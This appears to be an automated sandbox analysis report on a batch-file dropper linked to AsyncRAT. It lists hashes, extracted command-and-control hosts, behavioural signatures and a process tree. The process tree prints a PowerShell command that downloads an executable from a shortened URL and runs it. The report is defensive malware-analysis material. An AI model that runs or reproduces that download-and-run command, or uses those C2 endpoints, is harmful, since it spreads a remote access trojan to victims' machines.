Analysis
- max time kernel: 146s
- max time network: 153s
- platform: windows10-2004_x64
- resource: win10v2004-20241007-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 29/10/2024, 23:30

Static task: static1
Behavioral task: behavioral1
Sample: file-ly5.bat
Resource: win7-20241010-en
General
- Target: file-ly5.bat
- Size: 604B
- MD5: a382e3f085e005edb9c5ea215109bb9b
- SHA1: e7454672385b823bd0e26eaaf092aa9f04607429
- SHA256: 5b60f3dc0e0e96085cdddb8d8135eede32ccc9f0981996261a8cf27d4be2dbfb
- SHA512: bee9a075e2acb3c47c24590e0b98a0949d5b7d6a86f017b0290304413bbac3b25e89ea8549a0be4fdfb88604ce6d950a151b3cd3370b71aefa9fbce3273a87ee
Malware Config
Extracted (download URL): https://u.to/nBL7IA
Extracted (family: asyncrat, config name: Default)
- C2 hosts:
  - 127.0.0.1:43655
  - excellent-waiver.gl.at.ply.gg:43655
  - tcp://gg123213123sadas-38622.portmap.host:43655
- delay: 1
- install: false
- install_folder: %AppData%
Signatures
- Asyncrat family
- Async RAT payload (1 IoC)
  resource behavioral2/files/0x0008000000023ca5-24.dat matched yara rule family_asyncrat
- Blocklisted process makes network request (2 IoCs)
  flow 8, pid 4948, powershell.exe
  flow 12, pid 4948, powershell.exe
- Downloads MZ/PE file
- Checks computer location settings (2 TTPs, 1 IoC)
  Looks up country code configured in the registry, likely geofence.
  Key value queried: \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation (process: file.exe)
- Executes dropped EXE (2 IoCs)
  pid 2964, file.exe
  pid 632, Infected.exe
- Command and Scripting Interpreter: PowerShell
  pid 4948, powershell.exe
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).
- System Network Configuration Discovery: Internet Connection Discovery (1 TTP, 2 IoCs)
  Adversaries may check for Internet connectivity on compromised systems.
  pid 1948, PING.EXE
  pid 2792, PING.EXE
- Runs ping.exe (1 TTP, 2 IoCs)
  pid 2792, PING.EXE
  pid 1948, PING.EXE
- Suspicious behavior: EnumeratesProcesses (2 IoCs)
  pid 4948, powershell.exe
  pid 4948, powershell.exe
- Suspicious use of AdjustPrivilegeToken (2 IoCs)
  Token: SeDebugPrivilege, pid 4948, powershell.exe
  Token: SeDebugPrivilege, pid 632, Infected.exe
- Suspicious use of WriteProcessMemory (10 IoCs)
  PID 3212 (cmd.exe) wrote to memory of 4948, procid_target 85
  PID 3212 (cmd.exe) wrote to memory of 4948, procid_target 85
  PID 3212 (cmd.exe) wrote to memory of 2964, procid_target 88
  PID 3212 (cmd.exe) wrote to memory of 2964, procid_target 88
  PID 3212 (cmd.exe) wrote to memory of 1948, procid_target 89
  PID 3212 (cmd.exe) wrote to memory of 1948, procid_target 89
  PID 2964 (file.exe) wrote to memory of 632, procid_target 91
  PID 2964 (file.exe) wrote to memory of 632, procid_target 91
  PID 3212 (cmd.exe) wrote to memory of 2792, procid_target 96
  PID 3212 (cmd.exe) wrote to memory of 2792, procid_target 96
Processes
- C:\Windows\system32\cmd.exe (PID 3212, depth 1)
  Command line: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\file-ly5.bat"
  - Suspicious use of WriteProcessMemory
  Children:
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 4948, depth 2)
    Command line: powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://u.to/nBL7IA', 'file.exe')"
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
  - C:\Users\Admin\AppData\Local\Temp\file.exe (PID 2964, depth 2)
    Command line: "file.exe"
    - Checks computer location settings
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    Children:
    - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Infected.exe (PID 632, depth 3)
      Command line: "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Infected.exe"
      - Executes dropped EXE
      - Suspicious use of AdjustPrivilegeToken
  - C:\Windows\system32\PING.EXE (PID 1948, depth 2)
    Command line: ping localhost -n 3
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
  - C:\Windows\system32\PING.EXE (PID 2792, depth 2)
    Command line: ping localhost -n 3
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
Network
MITRE ATT&CK Enterprise v15
Downloads
- File 1
  Filesize: 63KB
  MD5: 29b38d4c415d9b464f1ff073e0a43913
  SHA1: ddf87b649f725c62ebd42914c71b2e446f1aeddf
  SHA256: 6fd7acee70eef7574951bc9def49e41c2fde7aea50141672dcb1b2c79f510549
  SHA512: 3f5801764e4c124c3b5cea11ddc3a79eb5cf37cb1bc50059ba2f9010200e717b36c726409595a1064dcf364eeb77fd801d8ef6ca73546a498e0dff5d9e668897
- File 2
  Filesize: 60B
  MD5: d17fe0a3f47be24a6453e9ef58c94641
  SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
  SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
  SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
- File 3
  Filesize: 465KB
  MD5: d435bd69c788f8f42a73158ea2526716
  SHA1: dc640272ce6c4a1bf8487ab917fd175b034de7aa
  SHA256: 98208142a545c388e0fc0efcf8a6b203673412c0510ab330c47337fa74bb4dc2
  SHA512: 729200f3d1e30f90f81defb6e392a90d54509fdf55238971e7ba1df2663fb9f042490a8329bad5c02a8768e956d41d1180049414802f08a6974b35f03d953b62